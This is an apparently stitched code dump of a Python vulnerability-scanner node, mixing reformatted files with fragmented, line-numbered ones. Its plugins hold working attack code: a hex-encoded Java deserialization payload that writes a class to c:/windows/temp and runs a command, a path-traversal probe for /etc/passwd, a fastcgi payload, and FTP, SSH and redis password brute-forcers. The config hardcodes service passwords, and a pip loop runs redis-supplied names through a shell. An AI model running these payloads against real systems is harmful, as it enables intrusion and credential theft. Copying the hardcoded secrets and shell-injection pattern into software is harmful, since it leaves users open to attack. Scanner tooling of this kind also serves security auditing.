    :param timestr: e.g. '2016-02-25 20:21:04.242'
    :return: datetime, e.g. 2016-02-25 20:21:04.242000
    """
    fmt = "%Y-%m-%d %H:%M:%S.%f"
    return datetime.strptime(timestr, fmt)
def getInstance(self):
    """Return the process-wide root logger (method of Utils.mylog.Log).

    Handlers come from logger.conf, loaded by __init__ via
    logging.config.fileConfig, so no per-call handler wiring is needed.
    """
    return logging.getLogger()
def check(module_name, ip) -> (bool, bool, str):
    """Generic scan entry point.

    Dynamically imports ``scripts.<module_name>``, injects the shared
    dictionaries fetched from redis as module attributes, then runs the
    plugin's ``do(ip)``.

    :param module_name: plugin module name under the scripts package
    :param ip: target address handed to the plugin's do()
    :return: (status, script_check_status, ret) where
             status - True if the plugin ran without an unexpected exception
             script_check_status - True if the plugin reported an issue
             ret - detail message from the plugin, or the error text on failure
    """
    # NOTE: annotation fixed — the function returns a 3-tuple, the old
    # "-> (bool, str)" hint was wrong.
    status = False                # did the plugin run without crashing?
    script_check_status = False   # plugin verdict: True means issue found
    ret = ""
    try:
        _dic = get_config()
        scrip = importlib.import_module('scripts.' + module_name)
        for k, v in _dic.items():
            # redis returns bytes keys; attribute names must be str
            setattr(scrip, k.decode(encoding='utf-8'), v)
        log.info("准备执行啦.... " + module_name)
        script_check_status, ret = scrip.do(ip)
        log.info('执行完了......... ' + module_name)
        status = True
    except Exception as err:
        # was log.info: a failed plugin run belongs at error level
        log.error("VulRun-check failed: {},\ndetail - {}".format(err, traceback.format_exc()))
        status = False
        ret = str(err.args)
    return status, script_check_status, ret
def __init__(self):
    """Populate the default configuration (method of config.Config).

    Covers RabbitMQ connection/queue/exchange settings, redis connection
    settings and the heartbeat interval; environment overrides are
    applied separately by get_env().
    """
    defaults = {
        'MQ_URL': '172.22.139.13',
        'MQ_PORT': 5672,
        'MQ_SCAN_QUEUE': "prod_scan_queue",
        'MQ_SCAN_QUEUE_PRIO': 3,
        'MQ_HEART_EXCHANGE': "prod_heart_exchange",
        'MQ_HEART_EXCHANGE_TYPE': "fanout",
        'MQ_RESULT_EXCHANGE': "prod_result_exchange",
        # (sic) misspelled attribute name kept — callers reference it as-is
        'MQ_RESULT_EXCHNAGE_TYPE': "fanout",
        'MQ_USER': "test",
        'MQ_PASS': "88888888",
        # ======= REDIS =======
        'REDIS_URL': "127.0.0.1",
        'REDIS_PORT': 6379,
        'REDIS_PASS': "davy811220",
        'REDIS_DB': 0,
        # heartbeat interval in seconds
        'HEART_RATE': 60,
    }
    for attr_name, attr_value in defaults.items():
        setattr(self, attr_name, attr_value)
proc_result_exchange:fanout 40 | print("MQ_RESULT_ENV:", mq_result_str) 41 | redis_info_str = os.environ.get('REDIS_ENV') # db_num:password@ip:port 42 | print("REDIS_ENV:", redis_info_str) 43 | heart_rate = os.environ.get('HEART_RATE') 44 | print("HEART_RATE:", heart_rate) 45 | try: 46 | if heart_rate is not None: 47 | self.HEART_RATE = int(heart_rate) 48 | if mq_info_str is not None: 49 | mq_info = str(mq_info_str).strip().split('@') 50 | if len(mq_info) != 2: 51 | raise Exception('analysis mq_env length not equal 2, failed.') 52 | # 整理 MQ相关的 53 | mq_info_account = mq_info[0].split(':') 54 | self.MQ_USER = mq_info_account[0].strip() 55 | self.MQ_PASS = mq_info_account[1].strip() 56 | mq_info_url = mq_info[1].split(':') 57 | self.MQ_URL = mq_info_url[0].strip() 58 | self.MQ_PORT = int(mq_info_url[1].strip()) 59 | if mq_scan_str is not None: 60 | mq_tmp = mq_scan_str.split(":") 61 | self.MQ_SCAN_QUEUE = mq_tmp[0].strip() 62 | self.MQ_SCAN_QUEUE_PRIO = int(mq_tmp[1].strip()) 63 | if mq_heart_str is not None: 64 | mq_tmp = mq_heart_str.split(':') 65 | self.MQ_HEART_EXCHANGE = mq_tmp[0] 66 | self.MQ_HEART_EXCHANGE_TYPE = mq_tmp[1] 67 | if mq_result_str is not None: 68 | mq_tmp = mq_result_str.split(':') 69 | self.MQ_RESULT_EXCHANGE = mq_tmp[0] 70 | self.MQ_RESULT_EXCHNAGE_TYPE = mq_tmp[1] 71 | 72 | # 整理redis相关的 db_num:password@ip:port 73 | if redis_info_str is not None: 74 | redis_info = str(redis_info_str).strip().split('@') 75 | if len(redis_info) != 2: 76 | raise Exception('analysis redis_env length not equal 2, failed.') 77 | redis_tmp = redis_info[0].split(':') 78 | if len(redis_tmp) != 2: 79 | self.REDIS_DB = 0 80 | self.REDIS_PASS = '' 81 | else: 82 | self.REDIS_DB = int(redis_tmp[0].strip()) 83 | self.REDIS_PASS = redis_tmp[1].strip() 84 | redis_tmp = redis_info[1].split(':') 85 | self.REDIS_URL = redis_tmp[0].strip() 86 | self.REDIS_PORT = int(redis_tmp[1].strip()) 87 | except Exception as err: 88 | print('analysis env args failed. 
def readfirstline(filename) -> str:
    """Return the first line of *filename* (including its trailing newline).

    Creates the file empty when it does not yet exist, mirroring the
    original behaviour; returns "" on any error.

    :param filename: path of the file to read
    :return: first line, or "" if the file is empty, missing, or unreadable
    """
    try:
        if not os.path.exists(filename):
            # portable replacement for os.mknod, which requires elevated
            # privileges on some platforms (e.g. macOS)
            with open(filename, 'a'):
                pass
        with open(filename, 'r') as f:
            return f.readline()
    except Exception:
        # best effort: callers treat "" as "no version recorded"
        return ""
def get_pipupdate():
    """Fetch the raw 'package_update' value from redis.

    :return: redis value (bytes) or None when the key is missing
             or the lookup fails
    """
    try:
        connection = __get_connection()
        return connection.get("package_update")
    except Exception as err:
        log.error("get_pipupdate failed. {}, \ndetail:{}".format(err, traceback.format_exc()))
        return None
def send_heart(heart_str, rkeyname) -> bool:
    """Publish a heartbeat to redis.

    Stores *heart_str* under key "heart_<hostname>" with a 5-day expiry.

    :param heart_str: serialized heartbeat payload
    :param rkeyname: legacy list key name, kept for interface
                     compatibility (the old lpush call was retired)
    :return: True on success, False on failure
    """
    try:
        conn = __get_connection()
        extime = 3600 * 24 * 5  # expire after 5 days
        conn.set(name="heart_" + socket.gethostname(), value=heart_str, ex=extime)
        conn.close()
        return True  # was missing: the function is declared -> bool
    except Exception as err:
        # was logging the traceback *module* object, not the trace text
        log.error("send_heart failed. {}, \ndetail - {}".format(err, traceback.format_exc()))
        return False
# Logging configuration consumed by Utils/mylog.py via logging.config.fileConfig.
# Root logger fans out to the console and to a multiprocess-safe daily file.
# NOTE(review): "consoleHandler" under [loggers] is named like a handler and
# [logger_root] references "errorhandler" — the names only line up because the
# matching sections below exist; confirm before renaming anything here.
[loggers]
keys=root,consoleHandler,errorlogger

[logger_root]
level=DEBUG
handlers=consoleHandler,errorhandler

[logger_consoleHandler]
handlers=consoleHandler
qualname=consoleLogger
propagate=0

[logger_errorlogger]
handlers=errorhandler
qualname=errorlogger
propagate=0

###############################################

[handlers]
keys=consoleHandler,errorhandler

# Console output, INFO and above.
[handler_consoleHandler]
class=StreamHandler
level=INFO
formatter=form01
args=(sys.stdout,)

# Daily-rotated file handler safe for multiple processes (see mlogging/).
[handler_errorhandler]
class=mlogging.TimedRotatingFileHandler_MP
level=INFO
formatter=form01
args=('logs/xnsec.log', 'D', 1, 0)

###############################################

[formatters]
keys=form01

[formatter_form01]
format=%(asctime)s %(filename)s(%(lineno)d) [%(process)d] %(levelname)s %(module)s %(funcName)s %(message)s
multiprocessing.Process(target=HeartBeatHandler.HeartMonitor, args=()).start() 14 | # 失败消息重试 15 | multiprocessing.Process(target=recovermq.recover, args=()).start() 16 | # 扫描 17 | ScanHandler.scanmonitor() 18 | # p = multiprocessing.Process(target=test) 19 | # p.start() 20 | # time.sleep(10) 21 | # p.terminate() 22 | # p.join() 23 | # print('end....12113') 24 | -------------------------------------------------------------------------------- /mlogging/__init__.py: -------------------------------------------------------------------------------- 1 | # Copyright 2001-2007 by Vinay Sajip. All Rights Reserved. 2 | # 3 | # Permission to use, copy, modify, and distribute this software and its 4 | # documentation for any purpose and without fee is hereby granted, 5 | # provided that the above copyright notice appear in all copies and that 6 | # both that copyright notice and this permission notice appear in 7 | # supporting documentation, and that the name of Vinay Sajip 8 | # not be used in advertising or publicity pertaining to distribution 9 | # of the software without specific, written prior permission. 10 | # VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING 11 | # ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL 12 | # VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR 13 | # ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER 14 | # IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT 15 | # OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
class StreamHandler_MP(StreamHandler):
    """StreamHandler variant intended for use from multiple processes.

    Before delegating to the normal StreamHandler.emit, the stream is
    seeked to its end so concurrent writers appending to the same file
    do not overwrite each other's output.
    """

    def emit(self, record):
        """Emit *record*, first seeking to end-of-stream when possible."""
        stream = self.stream
        try:
            seek = getattr(stream, "seek", None)
            if seek is not None:
                seek(0, os.SEEK_END)
        except IOError:
            # seeking is best-effort; fall through to the normal emit
            pass
        StreamHandler.emit(self, record)
def emit(self, record):
    """Emit a record (method of RotatingFileHandler_MP).

    Rolls the file over first when shouldRollover() says so, then
    serialises the actual write across processes with an exclusive
    flock on a per-level lock file under self._lock_dir.
    """
    try:
        if self.shouldRollover(record):
            self.doRollover()
        lock_path = '{}/{}.{}'.format(self._lock_dir,
                                      os.path.basename(self.baseFilename),
                                      record.levelname)
        lock_file = open(lock_path, "w+")
        fcntl.flock(lock_file.fileno(), fcntl.LOCK_EX)
        FileHandler_MP.emit(self, record)
        fcntl.flock(lock_file.fileno(), fcntl.LOCK_UN)
        lock_file.close()
    except (KeyboardInterrupt, SystemExit):
        raise
    except:
        self.handleError(record)
130 | """ 131 | _lock_dir = '.lock' 132 | if os.path.exists(_lock_dir): 133 | pass 134 | else: 135 | os.mkdir(_lock_dir) 136 | 137 | def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=0, utc=0): 138 | FileHandler_MP.__init__(self, filename, 'a', encoding, delay) 139 | self.encoding = encoding 140 | self.when = str.upper(when) 141 | self.backupCount = backupCount 142 | self.utc = utc 143 | # Calculate the real rollover interval, which is just the number of 144 | # seconds between rollovers. Also set the filename suffix used when 145 | # a rollover occurs. Current 'when' events supported: 146 | # S - Seconds 147 | # M - Minutes 148 | # H - Hours 149 | # D - Days 150 | # midnight - roll over at midnight 151 | # W{0-6} - roll over on a certain day; 0 - Monday 152 | # 153 | # Case of the 'when' specifier is not important; lower or upper case 154 | # will work. 155 | if self.when == 'S': 156 | self.suffix = "%Y-%m-%d_%H-%M-%S" 157 | self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}$" 158 | elif self.when == 'M': 159 | self.suffix = "%Y-%m-%d_%H-%M" 160 | self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}$" 161 | elif self.when == 'H': 162 | self.suffix = "%Y-%m-%d_%H" 163 | self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}$" 164 | elif self.when == 'D' or self.when == 'MIDNIGHT': 165 | self.suffix = "%Y-%m-%d" 166 | self.extMatch = r"^\d{4}-\d{2}-\d{2}$" 167 | elif self.when.startswith('W'): 168 | if len(self.when) != 2: 169 | raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when) 170 | if self.when[1] < '0' or self.when[1] > '6': 171 | raise ValueError("Invalid day specified for weekly rollover: %s" % self.when) 172 | self.dayOfWeek = int(self.when[1]) 173 | self.suffix = "%Y-%m-%d" 174 | self.extMatch = r"^\d{4}-\d{2}-\d{2}$" 175 | else: 176 | raise ValueError("Invalid rollover interval specified: %s" % self.when) 177 | 178 | self.extMatch = re.compile(self.extMatch) 179 | 180 | if 
def shouldRollover(self, record):
    """Return 1 if the log file should roll over, else 0.

    Method of TimedRotatingFileHandler_MP. *record* is unused; rollover
    is decided by comparing the current local time with the base file's
    mtime at the granularity selected by self.when
    (S / M / H / D / MIDNIGHT / W).
    """
    if not os.path.exists(self.baseFilename):
        return 0
    now = time.localtime(time.time())
    mtime = time.localtime(os.stat(self.baseFilename)[ST_MTIME])
    # struct_time index per granularity: 5=sec, 4=min, 3=hour, 2=day, 1=month
    when = self.when
    if when == "S":
        idx = 5
    elif when == "M":
        idx = 4
    elif when == "H":
        idx = 3
    elif when in ("MIDNIGHT", "D"):
        idx = 2
    elif when == "W":
        # NOTE: real weekly settings are 'W0'..'W6', so this branch never
        # fires in practice — kept to mirror the original logic exactly
        idx = 1
    else:
        return 0
    return 1 if now[idx] != mtime[idx] else 0
#!/bin/sh
# Entry point for a scanner node: refresh the code, sync dependencies,
# then start the long-running scanner process.
git pull https://e.coding.net/davytitan/xn-scannode.git
pip install -r ./requirements.txt -i https://pypi.doubanio.com/simple/
# marker file consumed by pipmanage.py for package-version tracking
touch package.ver
# echo "1.0.0" >> package.ver
# nohup crond >/dev/null 2>&1 &
python -u scan.py
def host_pip_install():
    """Daemon loop: keep pip packages in sync with a redis-published list.

    Polls redis once a minute for a "package_update" JSON document of the
    form {"version": ..., "packages": [{"install_name": ...,
    "module_name": ...}, ...], "mirror": ...}. When the version differs
    from the locally recorded one, installs any missing packages and
    records the new version only if every install succeeded.
    """
    while True:
        try:
            json_str = redishelper.get_pipupdate()
            if json_str is None:
                continue  # finally still runs, so this does not busy-spin
            # json.loads() lost its 'encoding' parameter in Python 3.9
            # (bytes input is decoded automatically), so it must not be
            # passed any more.
            json_obj = json.loads(json_str)
            local_ver = filehelper.readfirstline("package.ver").strip()
            all_suc = True
            if local_ver != json_obj['version']:
                log.info("pip有版本变化...")
                for p in json_obj["packages"]:
                    if p is None or len(p) == 0:
                        continue
                    # skip modules that already import cleanly (keeps logs quiet)
                    if __module_exist(p['module_name']):
                        continue
                    cmds = ["pip" + " install " + p['install_name'] + " -i " + json_obj['mirror']]
                    ret = subprocess.run(cmds, shell=True,
                                         stdout=subprocess.PIPE,
                                         stderr=subprocess.PIPE,
                                         encoding="utf-8")
                    log.info("pip_install: {}, return {},\nstderr:{},\nstdout:{}".format(cmds,
                             ret.returncode, ret.stderr, ret.stdout))
                    if ret.returncode != 0:
                        all_suc = False
                if all_suc:
                    filehelper.write("package.ver", json_obj['version'])
        except Exception as err:
            log.error("host_pip_install failed. {},\ndetail:{}".format(err, traceback.format_exc()))
        finally:
            time.sleep(60)
# coding=utf-8
import multiprocessing
import ScanHandler
import HeartBeatHandler
import recovermq, pipmanage
import time
from Utils import mylog

log = mylog.Log().getInstance()


if __name__ == "__main__":
    # Background workers, each in its own process:
    background_tasks = (
        HeartBeatHandler.HeartMonitor,   # 心跳
        recovermq.recover,               # 失败消息重试
        pipmanage.host_pip_install,      # pip packages 管理
    )
    for task in background_tasks:
        multiprocessing.Process(target=task, args=()).start()
    # 扫描 — the scan monitor loops forever in the main process.
    log.info("我准备好,要开始监控有没有任务了!!!!ready loop scan....")
    ScanHandler.scanmonitor()
'存在Docker无密码远程调用' 11 | except Exception as e: 12 | print(e) 13 | return False, '' -------------------------------------------------------------------------------- /scripts/FTP弱口令扫描[21]_8bddf610-6580-4ece-a96e-d7f5eebe5e94.py: -------------------------------------------------------------------------------- 1 | # -*-coding:utf-8-*- 2 | from ftplib import FTP 3 | 4 | def do(target): 5 | port = 21 6 | for user in SEC_USER_NAME: 7 | print(user) 8 | for pwd in SEC_PASSWORD: 9 | print(pwd) 10 | try: 11 | ftp = FTP(target) 12 | ftp.connect(target, port, 20) 13 | if ftp.login(user, pwd).startswith('2'): 14 | return True, user + '存在弱口令: ' + pwd 15 | except Exception as e: 16 | if not str(e).startswith('530'): 17 | print(e) 18 | else: 19 | print(e) 20 | return False, '' -------------------------------------------------------------------------------- /scripts/Java反序列化代码执行[8080]_fc328c6f-a103-4152-8660-de9f2e195911.py: -------------------------------------------------------------------------------- 1 | # -*-coding:utf-8-*- 2 | import binascii 3 | import socket 4 | import time 5 | 6 | 7 | def do(ip): 8 | port = 8080 9 | timeout = 5 10 | try: 11 | address = (ip, port) 12 | socket.setdefaulttimeout(timeout) 13 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 14 | sock.connect(address) 15 | send_packet_first = "4a524d4900024b000c31302e3130312e32322e333900000000" 16 | send_packet_second = "50aced00057722000000000000000000000000000000000000000000000000000044154dc9d4e63bdf7400057077" \ 17 | "6e6564737d00000001000f6a6176612e726d692e52656d6f746570787200176a6176612e6c616e672e7265666c65" \ 18 | "63742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f49" \ 19 | "6e766f636174696f6e48616e646c65723b7078707372003273756e2e7265666c6563742e616e6e6f746174696f6e" \ 20 | "2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62" \ 21 | 
"657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e67" \ 22 | "2f436c6173733b707870737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d" \ 23 | "61702e5472616e73666f726d65644d617061773fe05df15a700300024c000e6b65795472616e73666f726d657274" \ 24 | "002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b" \ 25 | "4c001076616c75655472616e73666f726d657271007e000a707870707372003a6f72672e6170616368652e636f6d" \ 26 | "6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c7" \ 27 | "97ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f" \ 28 | "6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b7078707572002d5b4c6f72672e617061636865" \ 29 | "2e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007078" \ 30 | "70000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f" \ 31 | "72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7474" \ 32 | "00124c6a6176612f6c616e672f4f626a6563743b707870767200186a6176612e696f2e46696c654f757470757453" \ 33 | "747265616d00000000000000000000007078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c" \ 34 | "656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce38020003" \ 35 | "5b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400" \ 36 | "124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e" \ 37 | "672f436c6173733b707870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000070" \ 38 | "787000000001757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a9902000070787000000001" \ 39 | "767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000070787074000e676574436f6e737472" \ 40 | 
"7563746f727571007e001d000000017671007e001d7371007e00167571007e001b00000001757200135b4c6a6176" \ 41 | "612e6c616e672e537472696e673badd256e7e91d7b4702000070787000000001740023633a2f77696e646f77732f" \ 42 | "74656d702f4572726f7242617365457865632e636c61737374000b6e6577496e7374616e63657571007e001d0000" \ 43 | "00017671007e001b7371007e00167571007e001b00000001757200025b42acf317f8060854e00200007078700000" \ 44 | "0624cafebabe0000003200650a002000350700360700370a000300380a0002003907003a0a000600350a0002003b" \ 45 | "0a0006003c08003d0a0006003e0a003f00400a003f00410a004200430a001f00440700450700460a001100350800" \ 46 | "470a001100480a0011003e0a001000490a0010003e08004a0a001a004b07004c0a001a004908004d08004e0a001f" \ 47 | "004f0700500700510100063c696e69743e010003282956010004436f646501000f4c696e654e756d626572546162" \ 48 | "6c65010009726561644279746573010029284c6a6176612f696f2f496e70757453747265616d3b294c6a6176612f" \ 49 | "6c616e672f537472696e673b01000d537461636b4d61705461626c6507003607003a07004c01000a457863657074" \ 50 | "696f6e73070052010007646f5f65786563010015284c6a6176612f6c616e672f537472696e673b29560700450700" \ 51 | "450100046d61696e010016285b4c6a6176612f6c616e672f537472696e673b295601000a536f7572636546696c65" \ 52 | "0100124572726f7242617365457865632e6a6176610c002100220100166a6176612f696f2f427566666572656452" \ 53 | "65616465720100196a6176612f696f2f496e70757453747265616d5265616465720c002100530c00210054010016" \ 54 | "6a6176612f6c616e672f537472696e674275666665720c005500560c005700580100010a0c0059005607005a0c00" \ 55 | "5b005c0c005d005e07005f0c006000610c002500260100136a6176612f6c616e672f457863657074696f6e010017" \ 56 | "6a6176612f6c616e672f537472696e674275696c646572010005383838383a0c005700620c0021002e0100043838" \ 57 | "38380c006300640100106a6176612f6c616e672f537472696e670100020d0a01000a636d64202f63206469720c00" \ 58 | "2d002e01000d4572726f7242617365457865630100106a6176612f6c616e672f4f626a6563740100136a6176612f" \ 59 | 
"696f2f494f457863657074696f6e010018284c6a6176612f696f2f496e70757453747265616d3b2956010013284c" \ 60 | "6a6176612f696f2f5265616465723b2956010008726561644c696e6501001428294c6a6176612f6c616e672f5374" \ 61 | "72696e673b010006617070656e6401002c284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e" \ 62 | "672f537472696e674275666665723b010008746f537472696e670100116a6176612f6c616e672f52756e74696d65" \ 63 | "01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b010004657865630100" \ 64 | "27284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176" \ 65 | "612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f49" \ 66 | "6e70757453747265616d3b01002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f53" \ 67 | "7472696e674275696c6465723b010007696e6465784f66010015284c6a6176612f6c616e672f537472696e673b29" \ 68 | "490021001f0020000000000004000100210022000100230000001d00010001000000052ab70001b1000000010024" \ 69 | "00000006000100000003000900250026000200230000007b0005000500000038bb000259bb0003592ab70004b700" \ 70 | "054cbb000659b700074d2bb60008594ec600112c2db60009120ab6000957a7ffec2cb6000b3a041904b000000002" \ 71 | "00240000001a00060000000600100007001800090021000a002f000d0035000e0027000000110002fd0018070028" \ 72 | "070029fc001607002a002b000000040001002c0009002d002e00020023000000af0006000300000065b8000c2ab6" \ 73 | "000d4c2bb6000eb8000f4dbb001059bb001159b700121213b600142cb60014b60015b70016bf4c2bb600171218b6" \ 74 | "001902a400052bbfbb001059bb001159b700121213b60014bb001a592bb60017b7001bb60014121cb60014b60015" \ 75 | "b70016bf00010000002b002b0010000200240000001e0007000000130008001400100015002b0018002c001a0039" \ 76 | "001c003b001f00270000000c00026b07002ffc000f070030002b000000040001001000090031003200020023000" \ 77 | "000220001000100000006121db8001eb10000000100240000000a00020000002600050027002b00000004000100" \ 78 | 
"100001003300000002003474000577726974657571007e001d000000017671007e002e737200116a6176612e757" \ 79 | "4696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c" \ 80 | "647078703f4000000000000c7708000000100000000174000576616c756571007e003578787672001b6a6176612" \ 81 | "e6c616e672e616e6e6f746174696f6e2e5461726765740000000000000000000000707870" 82 | send_packet_third = "50aced00057722000000000000000000000000000000000000000000000000000044" \ 83 | "154dc9d4e63bdf74000570776e6564737d00000001000f6a6176612e726d692e526" \ 84 | "56d6f746570787200176a6176612e6c616e672e7265666c6563742e50726f7879e12" \ 85 | "7da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742" \ 86 | "f496e766f636174696f6e48616e646c65723b7078707372003273756e2e7265666c65637" \ 87 | "42e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646" \ 88 | "c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f" \ 89 | "7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b70787" \ 90 | "0737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d6170" \ 91 | "2e5472616e73666f726d65644d617061773fe05df15a700300024c000e6b65795472616e73666f7" \ 92 | "26d657274002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472" \ 93 | "616e73666f726d65723b4c001076616c75655472616e73666f726d657271007e000a707870707372003a" \ 94 | "6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e4368" \ 95 | "61696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d657273" \ 96 | "74002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366" \ 97 | "6f726d65723b7078707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c6" \ 98 | "56374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007078700" \ 99 | "00000067372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732" \ 100 | 
"e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c00" \ 101 | "0969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b707870767200176a61766" \ 102 | "12e6e65742e55524c436c6173734c6f6164657200000000000000000000007078707372003a6f72672e61" \ 103 | "70616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b6572547" \ 104 | "2616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4" \ 105 | "f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b" \ 106 | "69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b707870757200135b4c6a61766" \ 107 | "12e6c616e672e4f626a6563743b90ce589f1073296c02000070787000000001757200125b4c6a6176612e6c616" \ 108 | "e672e436c6173733bab16d7aecbcd5a99020000707870000000017672000f5b4c6a6176612e6e65742e55524c3b" \ 109 | "5251fd24c51b68cd02000070787074000e676574436f6e7374727563746f727571007e001d000000017671007e" \ 110 | "001d7371007e00167571007e001b000000017571007e001b000000017571007e001f000000017372000c6a617661" \ 111 | "2e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726" \ 112 | "9747971007e00184c000466696c6571007e00184c0004686f737471007e00184c000870726f746f636f6c71007e001" \ 113 | "84c000372656671007e0018707870ffffffffffffffff707400112f633a2f77696e646f77732f74656d702f74000074" \ 114 | "000466696c65707874000b6e6577496e7374616e63657571007e001d000000017671007e001b7371007e0016757100" \ 115 | "7e001b0000000174000d4572726f7242617365457865637400096c6f6164436c6173737571007e001d00000001767" \ 116 | "200106a6176612e6c616e672e537472696e67a0f0a4387a3bb3420200007078707371007e00167571007e001b00000" \ 117 | "002740007646f5f657865637571007e001d0000000171007e00367400096765744d6574686f647571007e001d0000000" \ 118 | "271007e003671007e00237371007e00167571007e001b0000000270757200135b4c6a6176612e6c616e672e53747269" \ 119 | 
# -*-coding:utf-8-*-
from redis import Redis

def do(target):
    """Try each password from the injected SEC_PASSWORD wordlist (global
    supplied by the scan runner) against *target*:6379.

    Returns (True, detail) on the first successful PING, else (False, '').
    """
    port = 6379
    for pwd in SEC_PASSWORD:
        # socket_timeout bounds each attempt instead of hanging on dead hosts.
        conn = Redis(host=target, port=port, password=pwd, socket_timeout=5)
        try:
            if conn.ping():
                return True, ("弱口令: %s" % pwd)
        except Exception as e:
            print(e)
        finally:
            # Release the pooled socket so a long wordlist doesn't leak fds;
            # the original kept every failed connection's pool alive.
            conn.connection_pool.disconnect()
    return False, ''
client.set_missing_host_key_policy(AutoAddPolicy()) 9 | for user in SEC_USER_NAME: 10 | print(user) 11 | for pwd in SEC_PASSWORD: 12 | print(pwd) 13 | try: 14 | client.connect(target, port, user, pwd, banner_timeout=3000, auth_timeout=10) 15 | return True, ("弱口令:%s, %s" % (user, pwd)) 16 | except Exception as e: 17 | print(e) 18 | return False, '' -------------------------------------------------------------------------------- /scripts/WebServer任意文件读取[80]_c04faae4-33b6-45be-bb7c-6cace5d5d4eb.py: -------------------------------------------------------------------------------- 1 | # -*-coding:utf-8-*- 2 | import socket 3 | 4 | 5 | def do(ip): 6 | port = 80 7 | try: 8 | socket.setdefaulttimeout(5) 9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | s.connect((ip, int(port))) 11 | flag = b"GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n" 12 | s.send(flag) 13 | data = s.recv(1024) 14 | s.close() 15 | if b'root:' in data and b'nobody:' in data: 16 | return True, "存在WebServer任意文件读取漏洞" 17 | except: 18 | pass 19 | return False, '' 20 | -------------------------------------------------------------------------------- /scripts/dockerdemo.py: -------------------------------------------------------------------------------- 1 | import docker 2 | 3 | 4 | if __name__ == "__main__": 5 | c = docker.DockerClient(base_url='unix:///var/run/docker.sock') 6 | print(c.info()) 7 | 8 | -------------------------------------------------------------------------------- /scripts/fastcgi目录读取_14e0818f-cafd-4fc4-a984-260aa0016765.py: -------------------------------------------------------------------------------- 1 | # -*-coding:utf-8-*- 2 | import socket 3 | import time 4 | 5 | 6 | def bin2str(data): 7 | data_s = '' 8 | data = data.replace('\n', '') 9 | for _ in data.split(): 10 | data_s += chr(int(_, 16)) 11 | return data_s 12 | 13 | 14 | exp_payload_base = bin2str(""" 15 | 01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00 16 | 01 04 00 01 01 14 04 00 0e 04 52 45 51 55 45 53 
